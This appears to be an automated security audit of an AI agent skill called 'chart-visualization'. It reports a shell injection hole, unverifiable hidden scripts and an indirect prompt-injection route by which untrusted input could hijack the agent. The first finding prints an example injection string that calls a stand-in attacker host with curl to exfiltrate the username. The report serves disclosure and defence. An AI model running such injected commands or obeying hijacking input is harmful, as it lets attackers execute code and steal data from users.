chart-visualization
Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: HIGHCOMMAND_EXECUTIONREMOTE_CODE_EXECUTIONPROMPT_INJECTION
Full Analysis
- [COMMAND_EXECUTION] (HIGH): Potential Shell Injection vulnerability in the execution workflow. The instructions in
SKILL.mddirect the agent to executepython ./scripts/generate.py '<payload_json>'. Since the<payload_json>is constructed from user-extracted parameters (liketitleordata), an attacker can provide input containing a single quote to break out of the command string and execute arbitrary bash commands (e.g.,' ; curl attacker.com/$(whoami) ; '). - [REMOTE_CODE_EXECUTION] (MEDIUM): The skill depends on a local script
./scripts/generate.pyand multiple reference files inreferences/that are not included in the skill package. This represents an 'unverifiable dependency' risk, as the actual logic for processing the JSON payload and generating the chart remains hidden and could contain malicious operations. - [PROMPT_INJECTION] (HIGH): Significant Indirect Prompt Injection surface. The skill is designed to ingest untrusted data from the user to 'Intelligently select' chart types and extract parameters. Because this data is used to build a shell command without explicit sanitization or boundary marker instructions, malicious input can hijack the agent's logic to execute unintended actions or exfiltrate data via the generated payload.
Recommendations
- AI detected serious security threats
Audit Metadata